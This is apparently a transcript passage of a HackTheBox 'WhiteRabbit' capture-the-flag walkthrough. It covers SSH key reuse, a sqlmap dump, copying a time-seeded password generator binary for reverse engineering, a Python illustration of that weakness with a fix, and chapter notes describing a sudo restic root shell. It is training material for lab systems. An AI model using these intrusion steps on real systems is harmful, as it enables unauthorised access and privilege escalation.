And now I'm starting to get like a Matrix feel to this, because we have White Rabbit and now Morpheus. If we cat morpheus.pub, we have the key name morpheus@whiterabbit.htb. And I'm going to do the same thing with this key. So, we'll do grep -v like this. Backslash like that. morpheus, base64 -d, strings. strings is actually not on this box. Okay, let's go ahead and grab the key, copy it to a box. So, I'm just going to call this morpheus. I hope I spelled that correctly. And there's no line break at the end of this. grep -v. And there's like ssh-keygen. I think it's -k -y may do it. And it'll give you the public key. Let's see. base64 -d, strings. And the hostname is flx@blacklist. And this is actually the box author's username. So, I'm guessing they just generated it on their machine and then copied it on over. I think it's ssh-keygen. What did I say? -k -y. Does that work, morpheus? No. What is that flag? Oh, it's probably -f instead of -k. If we do -f morpheus -y, chmod 600 morpheus. There we go. So now we get the public key this way. And it is the box creator. And we could look at their GitHub. And this is just something I always test for. Hopefully the box creator doesn't get mad at me for showing this. But it's not really a vulnerability because that's not their actual public key. But the reason why I'm testing for this is maybe blacklist is the box, like their laptop, right? And this is their username on the laptop. So it's not unreasonable to think maybe they use this public key on GitHub itself. And GitHub lets us export all the public keys of a user. So we can go over to GitHub. So github.com and then their username, which is flx0x0000. So, this is going to get us to their GitHub, right? And we could do .keys after their username and it gives us their SSH public keys. And we look at this. It is ecdsa-sha2-nistp256. It's going to be this. This begins with a bunch of A's, ends with LVZC, and it doesn't end the same.
So, this is not the key they used on GitHub, which is good. But I thought that was just interesting, right? So, let's go ahead and use this key. So, we can do ssh -i morpheus and then, let's do whiterabbit.htb. Let's see. We probably should spell the name right, morpheus. There we go. And there we go. We're on the host box now and there is user.txt. If we do a sudo -l, it requires the password. We don't know Morpheus's password, so we can't really do anything there. If we go back to like all the SQLite stuff, actually not SQLite, the SQL dump. But before I do that, if we look at /home, there is a neo user. If we go in neo, we can't. But what I was saying is, let's see, let's go back to SQL. Let's see, what is this, ~/.local/share/sqlmap. Awesome. output, the host, dump, and this should give us all the tables. Let's see, temp. Okay. command_log.csv. So we can see the command log was all the SQL commands that were run, but they went to cd /home/neo and they used this neo password generator. And if we go to this box, let's see, cd /opt, there is a neo password generator, and if we run this we get a random password every time we run it. So if we echo -n, oops, pipe this into wc -c, it has to be 20 characters. So we have them going in, running the password generator, and we also have the time they ran this command. And one of the big vulnerabilities with password generators is just an insecure use of like a seed. So maybe if they just use the seed based upon this time, we'll be able to create another program that mimics how they generate the password, set the time to this exact second, run the command, and then get the password. So let's go over here. Let's see. Let's just copy this. So let's do scp -i morpheus morpheus@whiterabbit.htb:/opt/neo-password-generator. Just copy this here. Hopefully that works. There we go. It's copying. So, let's open up opt. I should have Ghidra, right? Maybe I don't have Ghidra installed.
I'm going to go ahead and install Ghidra real quick so we can reverse this. Or maybe I can do it on video. It shouldn't take too long. Download Ghidra. I'm really surprised that's not on my box. Let's see. Go over here. I don't know if I want Ghidra Lite. When did they have Ghidra and Ghidra Lite? I am so confused. Okay, download from GitHub. What's new? Let's download the zip. Save it. I really thought I had Ghidra installed, but I guess not. That should be done downloading in a second. mv Downloads/ghidra 12.0 public zip. Is it done? It is. Into ghidra. Oh, I don't have permission in the /opt directory. So, let's do sudo mkdir ghidra. sudo 7z x. Unzip it. I'm so confused as to why I don't have it. Okay. Go in ghidra. ghidraRun. And hopefully there's no... Oh man, I have to install the JDK. I'm just going to pause the video and we will get this working. Okay, so this is the JDK I installed. It's not the one I normally do, but I couldn't find OpenJDK 21 on the version of Parrot I'm running, so
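The weakness the transcript is about to reverse out of the neo password generator (and that the description summarises as "uses random insecurely to set the seed"), as an added example written for this page rather than the box's own binary: a constructed Python model of a generator seeded from a millisecond clock, beside the fix. The point a defender wants to see is that a 20-character password from a 62-symbol alphabet looks like about 119 bits of entropy, but when the seed is a clock reading inside a logged second the whole output space is 1000 strings, roughly 10 bits. The seeding scheme, alphabet and length are assumptions chosen to match the 20-character output seen on the box; the real binary's exact PRNG is not known from the page.

```python
import math
import random
import secrets
import string
import time

ALPHABET = string.ascii_letters + string.digits  # 62 symbols (assumed, not taken from the binary)
LENGTH = 20                                      # matches the 20-byte output measured on the box


def seeded_password(seed_ms: int) -> str:
    """Constructed model of a clock-seeded generator (hypothetical, not the box's code).

    random.Random is a deterministic Mersenne Twister: same seed in, same password out,
    so whoever knows the seed knows the password.
    """
    rng = random.Random(seed_ms)
    return "".join(rng.choice(ALPHABET) for _ in range(LENGTH))


def insecure_generate() -> tuple:
    """What a time-seeded generator effectively does: the clock reading is the whole secret."""
    seed = int(time.time() * 1000)
    return seed, seeded_password(seed)


def keyspace_for_second(ts_seconds: int) -> set:
    """Every password the model can emit during one wall-clock second.

    A command log that records the run time to the second bounds the search to
    these 1000 millisecond seeds; this is what 'adding milliseconds' in the video means.
    """
    base = ts_seconds * 1000
    return {seeded_password(base + ms) for ms in range(1000)}


def effective_bits(window_seconds: int = 1) -> float:
    """Entropy actually delivered when the seed is a millisecond clock within a known window."""
    return math.log2(window_seconds * 1000)


def nominal_bits() -> float:
    """Entropy the output appears to have: LENGTH symbols drawn from the alphabet."""
    return LENGTH * math.log2(len(ALPHABET))


def secure_generate() -> str:
    """The fix: draw each symbol from the OS CSPRNG via secrets. No seed, nothing to replay."""
    return "".join(secrets.choice(ALPHABET) for _ in range(LENGTH))


if __name__ == "__main__":
    seed, pw = insecure_generate()
    print(f"seed {seed} -> {pw}; replayed: {seeded_password(seed)}")
    print(f"nominal {nominal_bits():.1f} bits, effective {effective_bits():.1f} bits per known second")
    print(f"secrets-based: {secure_generate()}")
```

The review check this suggests for any home-grown generator is simple: if the code calls a seed function at all (srand, random.seed, Random(seed)), ask what feeds it; a timestamp, PID or counter collapses the output space to something a log line can reconstruct, and the language's CSPRNG interface (secrets, getrandom, /dev/urandom) needs no seeding in the first place.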

Original Description

00:00 - Introduction
01:00 - Start of nmap
05:10 - Playing with a JavaScript Client app (Vue) to get information to do recon and finding public /status/ page
12:00 - Looking at the N8N Workflow with GoPhish
14:30 - Looking at the JSON Schema File that leaks a secret key and shows possible SQL Injection
18:00 - Using CyberChef to test the HMAC Key and confirm we can sign payloads
21:50 - Switching to Caido to show we can create WorkFlows on the Replay (repeater) functionality
25:20 - Creating a convert workflow to HMAC Sign all our requests
35:40 - Using the MITM Python Library to quickly write a proxy that would sign our requests that makes it easier for tools to test this endpoint
45:20 - SQLMap found the injection, dumping tables discovering a restic password
48:50 - Using the restic CLI to download a backup, then cracking the 7z file. Cracking fails the first time due to a weird collision.
57:00 - On the box, we can run restic with sudo, use password-command to give us a root shell
1:05:50 - Finding the neo password generator, discovering it uses random insecurely to set the seed and generate password.
1:18:45 - Adding milliseconds to our timestamp and then bruteforcing the password to get root


This video provides a comprehensive guide to conducting a penetration test on the WhiteRabbit system, covering topics such as vulnerability identification, exploitation, and password cracking. The test utilizes various tools and techniques, including nmap, Burp Suite, and Caido. By following the steps outlined in the video, viewers can gain hands-on experience with penetration testing and improve their skills in identifying and exploiting vulnerabilities.

Key Takeaways
  1. Run nmap to identify open ports and services
  2. Use Burp Suite to intercept and modify HTTP requests
  3. Employ Caido for workflow automation and HMAC signing
  4. Exploit SQL injection vulnerabilities using sqlmap
  5. Crack passwords using hashcat and 7-Zip
  6. Reverse engineer password generators using Ghidra
💡 The video highlights the importance of identifying and exploiting vulnerabilities in web applications, as well as the need for secure password generators and MITM proxies. By utilizing various tools and techniques, penetration testers can gain access to sensitive information and improve the security
